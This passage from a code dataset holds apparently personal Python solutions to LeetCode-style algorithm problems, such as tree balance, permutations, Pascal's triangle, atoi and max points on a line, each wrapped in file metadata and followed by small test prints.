"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a boolean\n def isBalanced(self, root):\n '''Given a binary tree, determine if it is height-balanced.\n\nFor this problem, a height-balanced binary tree is defined as a binary tree in which the depth of the two subtrees of every node never differ by more than 1. '''\n return self.dfs(root)[0]\n\n def dfs(self, node):\n if node is None:\n return [0, True]\n l, lb = self.dfs(node.left)\n r, rb = self.dfs(node.right)\n max_height = max(l, r) + 1\n if abs(l - r) > 1:\n return [max_height, False]\n else:\n return [max_height, True and lb and rb]\n"
},
{
"alpha_fraction": 0.4844290614128113,
"alphanum_fraction": 0.5201845169067383,
"avg_line_length": 23.799999237060547,
"blob_id": "4acbe899e2d75150ddd34648ad7c5f2c5009c2a8",
"content_id": "d9acb29a83559b6f0d85585d7c03d5d845eca82e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 867,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 35,
"path": "/Find Minimum in Rotated Sorted Array II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return an integer\n def findMin(self, num):\n '''\n Follow up for \"Find Minimum in Rotated Sorted Array\":\n What if duplicates are allowed?\n\n Would this affect the run-time complexity? How and why?\n\nSuppose a sorted array is rotated at some pivot unknown to you beforehand.\n\n(i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).\n\nFind the minimum element.\n\nThe array may contain duplicates.\n '''\n l, r = 0, len(num) - 1\n while l < r:\n mid = (l + r) // 2\n if num[mid] == num[r]:\n r -= 1\n continue\n if num[mid] < num[r]:\n r = mid\n else:\n l = mid + 1\n return num[l]\n\na1 = [1, 1, 2, 0, 1, 1]\na2 = [1, 3, 3]\na = a2\nprint(len(a), a)\nprint(Solution.findMin(Solution(), a))"
},
{
"alpha_fraction": 0.4215053617954254,
"alphanum_fraction": 0.47096773982048035,
"avg_line_length": 26.382352828979492,
"blob_id": "c66039d3a2402894fbcce7055d4ac8c9d7813a71",
"content_id": "c0d9c939ea1a1bbd94d4d482660486614ba6a32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 34,
"path": "/Count and Say.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def countAndSay(self, n):\n '''\n The count-and-say sequence is the sequence of integers beginning as follows:\n1, 11, 21, 1211, 111221, ...\n\n1 is read off as \"one 1\" or 11.\n11 is read off as \"two 1s\" or 21.\n21 is read off as \"one 2, then one 1\" or 1211.\n\nGiven an integer n, generate the nth sequence.\n\nNote: The sequence of integers will be represented as a string. \n '''\n s = '1'\n if n == 1:\n return s\n\n for i in range(n - 1):\n k = 1\n next = ''\n for i in range(1, len(s)):\n if s[i] == s[i - 1]:\n k += 1\n else:\n next += chr(k + ord('0')) + s[i - 1]\n k = 1\n next += chr(k + ord('0')) + s[len(s) - 1]\n s = next\n return s\n\nfor i in range(10):\n print(Solution.countAndSay(Solution(), i))"
},
{
"alpha_fraction": 0.616782009601593,
"alphanum_fraction": 0.621107280254364,
"avg_line_length": 35.15625,
"blob_id": "0f956b49ba8fe565d8cb59fecb7c9d6bc9453dee",
"content_id": "fd1caca630f820f05de0d94330eda0e7752bb2ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1156,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 32,
"path": "/Validate Binary Search Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a boolean\n def isValidBST(self, root):\n ''' Given a binary tree, determine if it is a valid binary search tree (BST).\n\nAssume a BST is defined as follows:\n\n The left subtree of a node contains only nodes with keys less than the node's key.\n The right subtree of a node contains only nodes with keys greater than the node's key.\n Both the left and right subtrees must also be binary search trees.\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n return self.validBST(root, 0, 0, False, False)\n\n def validBST(self, node, l, r, lv, rv):\n if node is None:\n return True\n if lv and node.val <= l:\n return False\n if rv and node.val >= r:\n return False\n lchild = self.validBST(node.left, l, node.val, lv, True)\n rchild = self.validBST(node.right, node.val, r, True, rv)\n return lchild and rchild"
},
{
"alpha_fraction": 0.35316336154937744,
"alphanum_fraction": 0.384324848651886,
"avg_line_length": 22.04347801208496,
"blob_id": "743b3a14de71bec6ea33c6cd23caee192f20dd7b",
"content_id": "4921aee0483593009d86e88e830a9f602a633a9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1059,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 46,
"path": "/Spiral Matrix II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of lists of integer\n def generateMatrix(self, n):\n '''\n Given an integer n, generate a square matrix filled with elements from 1 to n2 in spiral order.\n\nFor example,\nGiven n = 3,\nYou should return the following matrix:\n\n[\n [ 1, 2, 3 ],\n [ 8, 9, 4 ],\n [ 7, 6, 5 ]\n]\n '''\n l, r, u, d = 0, n - 1, 0, n - 1\n m = [[0] * n for row in range(n)]\n k = 0\n while l <= r and u <= d:\n for i in range(l, r):\n k += 1\n m[u][i] = k\n for i in range(u, d + 1):\n k += 1\n m[i][r] = k\n if l == r or u == d:\n break\n for i in range(r - 1, l, -1):\n k += 1\n m[d][i] = k\n for i in range(d, u, -1):\n k += 1\n m[i][l] = k\n l += 1\n r -= 1\n u += 1\n d -= 1\n return m\n\nn1 = 5\nn = n1\nprint(n)\nm = Solution.generateMatrix(Solution(), n)\nfor row in m:\n print(row)"
},
{
"alpha_fraction": 0.35620439052581787,
"alphanum_fraction": 0.41605839133262634,
"avg_line_length": 33.25,
"blob_id": "4ca772f6ce8bc3b762146d77315f82be45e3bc74",
"content_id": "29a75db6def567238470b91ac3860390d667b83c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 685,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/Roman to Integer.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def romanToInt(self, s):\n '''\n Given a roman numeral, convert it to an integer.\n\nInput is guaranteed to be within the range from 1 to 3999.\n '''\n dic = [[\"M\", 1000], [\"CM\", 900], [\"D\", 500], [\"CD\", 400], [\"C\", 100],\n [\"XC\", 90], [\"L\", 50], [\"XL\", 40], [\"X\", 10],\n [\"IX\", 9], [\"V\", 5], [\"IV\", 4], [\"I\", 1]]\n index = 0\n t = 0\n num = 0\n while index < len(dic) and t < len(s):\n while s[t:t + len(dic[index][0])] == dic[index][0]:\n num += dic[index][1]\n t += len(dic[index][0])\n index += 1\n return num\n"
},
{
"alpha_fraction": 0.39862069487571716,
"alphanum_fraction": 0.43586206436157227,
"avg_line_length": 21,
"blob_id": "a73cdf790a6e33ef0358b01fcc85b86d22868b66",
"content_id": "1d905d2bcde33f8d494cbed084a6649c8e6c2c33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 33,
"path": "/Pascal's Triangle.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of lists of integers\n def generate(self, numRows):\n '''Given numRows, generate the first numRows of Pascal's triangle.\n\nFor example, given numRows = 5,\nReturn\n\n[\n [1],\n [1,1],\n [1,2,1],\n [1,3,3,1],\n [1,4,6,4,1]\n]\n'''\n if numRows == 0:\n return []\n res = [[1]]\n for i in range(1, numRows):\n ithrow = []\n for j in range(i + 1):\n x = 0\n if j < i:\n x = res[i - 1][j]\n if j > 0:\n x += res[i - 1][j - 1]\n ithrow.append(x)\n res.append(ithrow)\n return res\n\nnum = 10\nprint(Solution.generate(Solution(), num))"
},
{
"alpha_fraction": 0.5142180323600769,
"alphanum_fraction": 0.5373222827911377,
"avg_line_length": 32.09803771972656,
"blob_id": "ac1034028c8499681321515eb904e8dd1f60571c",
"content_id": "90a9a864223819f879315ce6133e5b1a024dbe6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1688,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 51,
"path": "/Maximal Rectangle.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of 1 length string\n # @return an integer\n def maximalRectangle(self, matrix):\n '''\n Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area. \n '''\n m = len(matrix)\n if m == 0:\n return 0\n n = len(matrix[0])\n height = [[0] * n for row in range(m)]\n for i in range(m):\n for j in range(n):\n k = ord(matrix[i][j]) - ord('0')\n height[i][j] = (height[i - 1][j] + 1) * k\n maximum = 0\n for i in range(m):\n maximum = max(maximum, self.largestRectangleArea(height[i]))\n return maximum\n\n # @param height, a list of integer\n # @return an integer\n def largestRectangleArea(self, height):\n '''\n Given n non-negative integers representing the histogram's bar height where the width of each bar is 1, find the area of largest rectangle in the histogram.\n\n\nAbove is a histogram where width of each bar is 1, given height = [2,1,5,6,2,3].\n\n\nThe largest rectangle is shown in the shaded area, which has area = 10 unit.\n\nFor example,\nGiven height = [2,1,5,6,2,3],\nreturn 10.\n '''\n n = len(height) + 1\n height.append(-1)\n stack = [[-1, -1]]\n maximum = 0\n for i in range(n):\n last = stack.pop()\n k = i\n while height[i] < last[0]:\n maximum = max(maximum, (i - last[1]) * last[0])\n k = last[1]\n last = stack.pop()\n stack.append(last)\n stack.append([height[i], k])\n return maximum\n"
},
{
"alpha_fraction": 0.47999998927116394,
"alphanum_fraction": 0.5057142972946167,
"avg_line_length": 24.962963104248047,
"blob_id": "916a89acb3dd6663fc3b70ed597e8847c80fba1e",
"content_id": "70627ea2d24af5abb1bea286eb73bbb777522b6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 700,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 27,
"path": "/Pascal's Triangle II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of integers\n def getRow(self, rowIndex):\n '''Given an index k, return the kth row of the Pascal's triangle.\n\nFor example, given k = 3,\nReturn [1,3,3,1].\n\nNote:\nCould you optimize your algorithm to use only O(k) extra space?\n'''\n rowIndex += 1\n if rowIndex == 0:\n return []\n ithrow = [0] * rowIndex\n for i in range(0, rowIndex):\n ithrow[i] = 1\n for j in range(i - 1, -1, -1):\n x = ithrow[j]\n if j > 0:\n x += ithrow[j - 1]\n ithrow[j] = x\n return ithrow\n\nnum = 2\nfor i in range(10):\n print(Solution.getRow(Solution(), i))"
},
{
"alpha_fraction": 0.4737499952316284,
"alphanum_fraction": 0.4925000071525574,
"avg_line_length": 27.60714340209961,
"blob_id": "ddb10eac20a23ee576de2d939eb4611fff89e1ee",
"content_id": "f665780d6cdd02aa8f857c75cb1f1cc3556cc8b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 28,
"path": "/Plus One.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param digits, a list of integer digits\n # @return a list of integer digits\n def plusOne(self, digits):\n '''\n Given a non-negative number represented as an array of digits, plus one to the number.\n\nThe digits are stored such that the most significant digit is at the head of the list.\n '''\n if len(digits) == 0:\n res = [1]\n return res\n digits.reverse()\n res = digits\n res[0] += 1\n i = 0\n while i < len(res) and res[i] > 9:\n res[i] -= 10\n if i < len(res) - 1:\n res[i + 1] += 1\n else:\n res.append(1)\n break\n i += 1\n res.reverse()\n return res\n\nprint(Solution.plusOne(Solution(), [0, 1]))"
},
{
"alpha_fraction": 0.45279502868652344,
"alphanum_fraction": 0.4708074629306793,
"avg_line_length": 29.980770111083984,
"blob_id": "b9abdad09acd0a705628828cd7ba06d06b60ab88",
"content_id": "dfcb6574b427d38a269cc4e1edbe8b2175c68b83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1610,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 52,
"path": "/Word Break II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @param dict, a set of string\n # @return a list of strings\n def wordBreak(self, s, dict):\n ''' Given a string s and a dictionary of words dict, add spaces in s to construct a sentence where each word is a valid dictionary word.\n\nReturn all such possible sentences.\n\nFor example, given\ns = \"catsanddog\",\ndict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"].\n\nA solution is [\"cats and dog\", \"cat sand dog\"]. '''\n mlen = 0\n for word in dict:\n mlen = max(len(word), mlen)\n slen = len(s)\n dp = list(range(slen + 1))\n dp[slen] = [slen]\n for i in range(slen - 1, -1, -1):\n dp[i] = []\n for j in range(i, min(i + mlen, slen)):\n if s[i:j + 1] in dict and len(dp[j + 1]) > 0:\n dp[i].append(j + 1)\n res = []\n if len(dp[0]) == 0:\n return res\n self.dfs(s, dp, 0, slen, [], res)\n return res\n\n def dfs(self, s, dp, cur, n, curpos, res):\n if cur == n:\n s1 = s\n nowplus = 0\n for pos in curpos:\n if pos != 0 and pos != n:\n s1 = s1[:pos + nowplus] + ' ' + s1[pos + nowplus:]\n nowplus += 1\n res.append(s1)\n return\n for pos in dp[cur]:\n curpos.append(pos)\n self.dfs(s, dp, pos, n, curpos, res)\n curpos.pop()\n\nA = ['1', '2', '3', '3', '2', '1', '4', '5', '4']\ndict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\na = 'catsanddog'\nso = Solution()\nres = so.wordBreak(a, dict)\nprint(res)"
},
{
"alpha_fraction": 0.5780553221702576,
"alphanum_fraction": 0.6101694703102112,
"avg_line_length": 41.32075500488281,
"blob_id": "2c172f425d366baa98304cdb9a2b9ea0d8fc370f",
"content_id": "18d5c288ee18fa86d761aee1887518b9f46849d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2242,
"license_type": "no_license",
"max_line_length": 294,
"num_lines": 53,
"path": "/String to Integer (atoi).py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def atoi(self, str):\n '''\n Implement atoi to convert a string to an integer.\n\nHint: Carefully consider all possible input cases. If you want a challenge, please do not see below and ask yourself what are the possible input cases.\n\nNotes: It is intended for this problem to be specified vaguely (ie, no given input specs). You are responsible to gather all the input requirements up front.\n\nspoilers alert... click to show requirements for atoi.\nRequirements for atoi:\n\nThe function first discards as many whitespace characters as necessary until the first non-whitespace character is found. Then, starting from this character, takes an optional initial plus or minus sign followed by as many numerical digits as possible, and interprets them as a numerical value.\n\nThe string can contain additional characters after those that form the integral number, which are ignored and have no effect on the behavior of this function.\n\nIf the first sequence of non-whitespace characters in str is not a valid integral number, or if no such sequence exists because either str is empty or it contains only whitespace characters, no conversion is performed.\n\nIf no valid conversion could be performed, a zero value is returned. If the correct value is out of the range of representable values, INT_MAX (2147483647) or INT_MIN (-2147483648) is returned.\n '''\n s = str.strip()\n sign = 1\n flag = 0\n res = 0\n for c in s:\n if c == '+':\n if flag != 0:\n return 0\n sign = 1\n flag = 1\n elif c == '-':\n if flag != 0:\n return 0\n sign = -1\n flag = 1\n elif ord(c) in range(ord('0'), ord('9') + 1):\n res = res * 10 + ord(c) - ord('0')\n flag = 2\n else:\n if flag != 2:\n return 0\n else:\n break\n if sign == 1:\n return min(res * sign, 2147483647)\n else:\n return max(res * sign, -2147483648)\n\ns0 = \"120030221\"\ns = s0\nprint(len(s), s)\nprint(Solution.atoi(Solution(), s))"
},
{
"alpha_fraction": 0.48563218116760254,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 28,
"blob_id": "85e53eb63d530f7e8ccf53f446f0aaebeefb1917",
"content_id": "c634a4759e0c679e7929f2804c33b8dfb4fb1289",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 24,
"path": "/Permutations.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return a list of lists of integers\n def permute(self, num):\n '''\n Given a collection of numbers, return all possible permutations.\n\nFor example,\n[1,2,3] have the following permutations:\n[1,2,3], [1,3,2], [2,1,3], [2,3,1], [3,1,2], and [3,2,1]. \n '''\n res = []\n self.dfs(num, [], res)\n return res\n\n def dfs(self, num, nowlist, res):\n if len(num) == 0:\n res.append(list(nowlist))\n return\n for i in range(len(num)):\n nowlist.append(num[i])\n del num[i]\n self.dfs(num, nowlist, res)\n num.insert(i, nowlist.pop())\n"
},
{
"alpha_fraction": 0.5271629691123962,
"alphanum_fraction": 0.5271629691123962,
"avg_line_length": 26.66666603088379,
"blob_id": "22636dbb4f7a77f284eac8147a755674f52d67f8",
"content_id": "e4004405798544b19ff496ed8eeaf81159253013",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 18,
"path": "/Reverse Words in a String.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return a string\n def reverseWords(self, s):\n \"\"\" Given an input string, reverse the string word by word.\n\nFor example,\nGiven s = \"the sky is blue\",\nreturn \"blue is sky the\". \"\"\"\n strs = s.split(' ')\n dic = []\n for str in strs:\n dic.append(str)\n dic_rev = [str for str in dic if str != '']\n dic_rev.reverse()\n #print(dic_rev)\n res = \" \".join(dic_rev).strip(' ')\n return res"
},
{
"alpha_fraction": 0.3957826495170593,
"alphanum_fraction": 0.41443634033203125,
"avg_line_length": 29.09756088256836,
"blob_id": "8e88afe648064e07e8c4dc6c1202a8bac0cec2da",
"content_id": "d8ee1ad6f4f5730df10865ea6a56608209abb64b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1233,
"license_type": "no_license",
"max_line_length": 182,
"num_lines": 41,
"path": "/Longest Palindromic Substring.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def longestPalindrome(self, s):\n '''\n Given a string S, find the longest palindromic substring in S. You may assume that the maximum length of S is 1000, and there exists one unique longest palindromic substring.\n '''\n if s == s[::-1]:\n return s\n last = -1\n lens = 0\n for i in range(2):\n l = i\n r = len(s)\n if r % 2 == 1 - i:\n r -= 1\n while l < r:\n mid = (l + r) // 2\n if mid % 2 == 1 - i:\n mid += 1\n start = self.checkPalindromic(s, mid)\n #print(l, r, mid, start)\n if start != -1:\n l = mid\n if mid > lens:\n lens = mid\n last = start\n else:\n r = mid - 2\n return s[last:last + lens]\n\n def checkPalindromic(self, s, l):\n for i in range(len(s) - l + 1):\n if s[i:i + l] == s[i:i + l][::-1]:\n return i\n return -1\n\ns0 = \"abcddcba\"\ns1 = \"abadd\"\ns = s1\nprint(len(s), s)\nprint(Solution.longestPalindrome(Solution(), s))"
},
{
"alpha_fraction": 0.4380090534687042,
"alphanum_fraction": 0.46787330508232117,
"avg_line_length": 31.52941131591797,
"blob_id": "7013a8cde90c6f411724d6dfb748a6624163bf7b",
"content_id": "c056118a64f07223a6ae73d80a920124b0365670",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 34,
"path": "/Median of Two Sorted Arrays.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a float\n def findMedianSortedArrays(self, A, B):\n '''There are two sorted arrays A and B of size m and n respectively. Find the median of the two sorted arrays. The overall run time complexity should be O(log (m+n)).\n '''\n la = len(A)\n lb = len(B)\n l = la + lb\n if l % 2 == 1:\n return self.findKth(A, la, B, lb, l // 2 + 1)\n else:\n return (self.findKth(A, la, B, lb, l // 2) + self.findKth(A, la, B, lb, l // 2 + 1)) * 0.5\n return self.findMedian(A, la, B, lb)\n\n def findKth(self, A, la, B, lb, k):\n if la == 0:\n return B[k - 1]\n if lb == 0:\n return A[k - 1]\n if k == 1:\n return min(A[0], B[0])\n i = min(k // 2, la)\n j = min(k // 2, lb)\n if A[i - 1] > B[j - 1]:\n return self.findKth(A, la, B[j:], lb - j, k - j)\n else:\n return self.findKth(A[i:], la - i, B, lb, k - i)\n\nA = [0, 10]\nB = [1.1, 2.1, 3.2]\nx = [[], [2,3]]\nso = Solution()\nprint(x)\nprint(so.findMedianSortedArrays(x[0], x[1]))"
},
{
"alpha_fraction": 0.3958333432674408,
"alphanum_fraction": 0.4166666567325592,
"avg_line_length": 21.04166603088379,
"blob_id": "e7c82bc16bd0ca9fab62ae49a5dcc91b37564a48",
"content_id": "2e89d27fb97c2bc53b654c39dc05cbe0979f8f54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 24,
"path": "/Sqrt(x).py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param x, an integer\n # @return an integer\n def sqrt(self, x):\n '''\n Implement int sqrt(int x).\n\nCompute and return the square root of x.\n '''\n l, r = 0, x\n while l < r:\n mid = (l + r) // 2\n if mid * mid <= x < (mid + 1) * (mid + 1):\n return mid\n if mid * mid > x:\n r = mid - 1\n else:\n l = mid + 1\n return l\n\nn1 = 111\nn = n1\nprint(n)\nprint(Solution.sqrt(Solution(), n))"
},
{
"alpha_fraction": 0.5968841314315796,
"alphanum_fraction": 0.6290165781974792,
"avg_line_length": 28.342857360839844,
"blob_id": "df6f78fe6ec57291bdc89dda377f053b9cc5b173",
"content_id": "56c103319f53abf5eb9da6019f68cef8168a2a87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1027,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 35,
"path": "/Sum Root to Leaf Numbers.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return an integer\n def sumNumbers(self, root):\n '''Given a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.\n\nAn example is the root-to-leaf path 1->2->3 which represents the number 123.\n\nFind the total sum of all root-to-leaf numbers.\n\nFor example,\n\n 1\n / \\\n 2 3\n\nThe root-to-leaf path 1->2 represents the number 12.\nThe root-to-leaf path 1->3 represents the number 13.\n\nReturn the sum = 12 + 13 = 25. '''\n return self.dfs(root, 0)\n\n def dfs(self, curnode, curnum):\n if curnode is None:\n return 0\n if curnode.left is None and curnode.right is None:\n return curnum * 10 + curnode.val\n return self.dfs(curnode.left, curnum * 10 + curnode.val) + self.dfs(curnode.right, curnum * 10 + curnode.val)\n"
},
{
"alpha_fraction": 0.31170159578323364,
"alphanum_fraction": 0.43740418553352356,
"avg_line_length": 35.588783264160156,
"blob_id": "54060760544211d10b223c7aa0f632cbed2a09d1",
"content_id": "7ba7d7f617497637509e208d46a3b608a9e8ac63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3914,
"license_type": "no_license",
"max_line_length": 925,
"num_lines": 107,
"path": "/Max Points on a Line.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a point\n# class Point:\n# def __init__(self, a=0, b=0):\n# self.x = a\n# self.y = b\n\n\nclass Solution:\n def gcd(self, a, b):\n if b != 0:\n return self.gcd(b, a % b)\n else:\n return a\n\n def reduce(self, p):\n if (p.x ** 2 + p.y ** 2) == 0:\n return '0 0'\n m = self.gcd(p.x, p.y)\n #print(str(p) + \",\" + str(m))\n return str(p.x / m) + ',' + str(p.y / m)\n\n # @param points, a list of Points\n # @return an integer\n def maxPoints(self, points):\n \"\"\"Given n points on a 2D plane, \\\nfind the maximum number of points that lie on the same straight line.\"\"\"\n count = len(points)\n if count < 3:\n return count\n res = 0\n for p in points:\n slopes = [self.reduce(Point(p1.x - p.x, p1.y - p.y)) for p1 in points]\n lines = {}\n for slope in slopes:\n if lines.get(slope) is None:\n lines[slope] = 1\n else:\n lines[slope] = lines.pop(slope) + 1\n for line in lines:\n tmp = lines[line]\n if line != '0 0':\n tmp += lines['0 0']\n if tmp > res:\n res = tmp\n return res\n\n # @param points, a list of Points\n # @return an integer\n def maxPointsTLE(self, points):\n \"\"\"Given n points on a 2D plane, \\\nfind the maximum number of points that lie on the same straight line.\"\"\"\n count = len(points)\n if count < 3:\n return count\n res = 2\n for i in range(0, count - 1):\n if count - i <= res:\n break\n for j in range(i + 1, count):\n tmp = 2\n for k in range(0, count):\n if k == i or k == j:\n continue\n inline = self.pointInLine(points[i], points[j], points[k])\n if inline:\n if k < j:\n break\n else:\n tmp += 1\n if tmp > res:\n res = tmp\n return res\n\n def vectorInLine(self, v1, v2):\n return v1.x * v2.y == v2.x * v1.y\n\n def pointInLine(self, p1, p2, p3):\n v1 = Point(p2.x - p1.x, p2.y - p1.y)\n v2 = Point(p3.x - p1.x, p3.y - p1.y)\n return self.vectorInLine(v1, v2)\n\n\nclass Point:\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\n\n def __str__(self):\n return str(self.x) + \" \" + str(self.y)\n\n\nlin = [(0, 0), (1, 1), (1, -1)]\nlin1 = [(560,248),(0,16),(30,250),(950,187),(630,277),(950,187),(-212,-268),(-287,-222),(53,37),(-280,-100),(-1,-14),(-5,4),(-35,-387),(-95,11),(-70,-13),(-700,-274),(-95,11),(-2,-33),(3,62),(-4,-47),(106,98),(-7,-65),(-8,-71),(-8,-147),(5,5),(-5,-90),(-420,-158),(-420,-158),(-350,-129),(-475,-53),(-4,-47),(-380,-37),(0,-24),(35,299),(-8,-71),(-2,-6),(8,25),(6,13),(-106,-146),(53,37),(-7,-128),(-5,-1),(-318,-390),(-15,-191),(-665,-85),(318,342),(7,138),(-570,-69),(-9,-4),(0,-9),(1,-7),(-51,23),(4,1),(-7,5),(-280,-100),(700,306),(0,-23),(-7,-4),(-246,-184),(350,161),(-424,-512),(35,299),(0,-24),(-140,-42),(-760,-101),(-9,-9),(140,74),(-285,-21),(-350,-129),(-6,9),(-630,-245),(700,306),(1,-17),(0,16),(-70,-13),(1,24),(-328,-260),(-34,26),(7,-5),(-371,-451),(-570,-69),(0,27),(-7,-65),(-9,-166),(-475,-53),(-68,20),(210,103),(700,306),(7,-6),(-3,-52),(-106,-146),(560,248),(10,6),(6,119),(0,2),(-41,6),(7,19),(30,250)]\nlin2 = [(1, 1), (1, 1), (1, 1)]\nlin3 = [(1, 1), (1, 1), (2, 2), (2, 2)]\nlins = [lin, lin1, lin2, lin3]\n\nfor lint in lins:\n points = []\n for kv in lint:\n #print(kv)\n points.append(Point(kv[0], kv[1]))\n #print(points)\n ss = Solution()\n print(len(lint), lint)\n print(ss.maxPoints(points))\n print()"
},
{
"alpha_fraction": 0.4475597143173218,
"alphanum_fraction": 0.475597083568573,
"avg_line_length": 26.542856216430664,
"blob_id": "899b429a6149e7566c7cc2d88cb70b97827b61c0",
"content_id": "26d4a004a437c13f023c53ccb6216173d24ee955",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 963,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 35,
"path": "/Permutations II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return a list of lists of integers\n def permuteUnique(self, num):\n '''\n Given a collection of numbers that might contain duplicates, return all possible unique permutations.\n\nFor example,\n[1,1,2] have the following unique permutations:\n[1,1,2], [1,2,1], and [2,1,1]. \n '''\n def nextPermutation(a):\n k = len(a) - 1\n while k > 0 and a[k - 1] >= a[k]:\n k -= 1\n i = k - 1\n if i == -1:\n return False\n while k < len(a) and a[k] > a[i]:\n k += 1\n k -= 1\n a[i], a[k] = a[k], a[i]\n a[i + 1:] = reversed(a[i + 1:])\n return True\n\n num.sort()\n res = [list(num)]\n while nextPermutation(num):\n res.append(list(num))\n return res\n\na1 = [1, 2, 3]\na = a1\nprint(a)\nprint(Solution.permuteUnique(Solution(), a))"
},
{
"alpha_fraction": 0.4206755459308624,
"alphanum_fraction": 0.45854657888412476,
"avg_line_length": 26.94285774230957,
"blob_id": "7945693ace8ae1adced9e4ba037fa370136735cc",
"content_id": "2820d5ddceff6d6c78fb9641b25658d831c7b500",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 985,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 35,
"path": "/Search Insert Position.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
